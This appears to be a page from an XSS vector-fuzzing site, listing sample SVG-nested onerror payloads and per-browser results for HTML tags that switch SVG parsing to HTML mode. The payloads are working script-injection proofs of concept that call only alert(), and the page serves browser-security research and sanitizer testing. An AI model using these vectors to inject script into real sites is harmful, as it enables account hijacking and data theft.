HTML tags that force HTML mode inside SVG
This vector shows which HTML elements cause the browser to change to HTML mode.
Created by: hackvertor
Created on: Friday, August 2, 2024 at 11:24:48 AM
Updated on: Saturday, September 14, 2024 at 2:42:01 PM
Vector type: XSS
Template used:
<svg><$[data1]><image src=data: onerror=log('$[data1]')></$[data1]></svg>Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<svg><sup><image src=data: onerror=alert('sup')></sup></svg><svg><dl><image src=data: onerror=alert('dl')></dl></svg><svg><sub><image src=data: onerror=alert('sub')></sub></svg><svg><u><image src=data: onerror=alert('u')></u></svg><svg><li><image src=data: onerror=alert('li')></li></svg><svg><tt><image src=data: onerror=alert('tt')></tt></svg><svg><i><image src=data: onerror=alert('i')></i></svg><svg><pre><image src=data: onerror=alert('pre')></pre></svg><svg><big><image src=data: onerror=alert('big')></big></svg><svg><menu><image src=data: onerror=alert('menu')></menu></svg><svg><span><image src=data: onerror=alert('span')></span></svg><svg><s><image src=data: onerror=alert('s')></s></svg><svg><center><image src=data: onerror=alert('center')></center></svg><svg><br><image src=data: onerror=alert('br')></br></svg><svg><title><image src=data: onerror=alert('title')></title></svg><svg><ol><image src=data: onerror=alert('ol')></ol></svg><svg><strike><image src=data: onerror=alert('strike')></strike></svg><svg><dt><image src=data: onerror=alert('dt')></dt></svg><svg><ruby><image src=data: onerror=alert('ruby')></ruby></svg><svg><head><image src=data: onerror=alert('head')></head></svg>Fuzz results
Chrome 127.0.0.0 desktop macOS 10.15.7
Found 39 results
| Data |
|---|
| b |
| Data |
|---|
| big |
| Data |
|---|
| blockquote |
| Data |
|---|
| body |
| Data |
|---|
| br |
| Data |
|---|
| center |
| Data |
|---|
| code |
| Data |
|---|
| dd |
| Data |
|---|
| div |
| Data |
|---|
| dl |
| Data |
|---|
| dt |
| Data |
|---|
| em |
| Data |
|---|
| embed |
| Data |
|---|
| h1 |
| Data |
|---|
| head |
| Data |
|---|
| hr |
| Data |
|---|
| i |
| Data |
|---|
| img |
| Data |
|---|
| li |
| Data |
|---|
| menu |
| Data |
|---|
| meta |
| Data |
|---|
| nobr |
| Data |
|---|
| ol |
| Data |
|---|
| p |
| Data |
|---|
| pre |
| Data |
|---|
| ruby |
| Data |
|---|
| s |
| Data |
|---|
| small |
| Data |
|---|
| span |
| Data |
|---|
| strike |
| Data |
|---|
| strong |
| Data |
|---|
| sub |
| Data |
|---|
| sup |
| Data |
|---|
| table |
| Data |
|---|
| title |
| Data |
|---|
| tt |
| Data |
|---|
| u |
| Data |
|---|
| ul |
| Data |
|---|
| var |
Firefox 128.0 desktop macOS 10.15
Found 1 result
| Data |
|---|
| title |
Safari 18.0 desktop macOS 10.15.7
Found 39 results
| Data |
|---|
| b |
| Data |
|---|
| big |
| Data |
|---|
| blockquote |
| Data |
|---|
| body |
| Data |
|---|
| br |
| Data |
|---|
| center |
| Data |
|---|
| code |
| Data |
|---|
| dd |
| Data |
|---|
| div |
| Data |
|---|
| dl |
| Data |
|---|
| dt |
| Data |
|---|
| em |
| Data |
|---|
| embed |
| Data |
|---|
| h1 |
| Data |
|---|
| head |
| Data |
|---|
| hr |
| Data |
|---|
| i |
| Data |
|---|
| img |
| Data |
|---|
| li |
| Data |
|---|
| menu |
| Data |
|---|
| meta |
| Data |
|---|
| nobr |
| Data |
|---|
| ol |
| Data |
|---|
| p |
| Data |
|---|
| pre |
| Data |
|---|
| ruby |
| Data |
|---|
| s |
| Data |
|---|
| small |
| Data |
|---|
| span |
| Data |
|---|
| strike |
| Data |
|---|
| strong |
| Data |
|---|
| sub |
| Data |
|---|
| sup |
| Data |
|---|
| table |
| Data |
|---|
| title |
| Data |
|---|
| tt |
| Data |
|---|
| u |
| Data |
|---|
| ul |
| Data |
|---|
| var |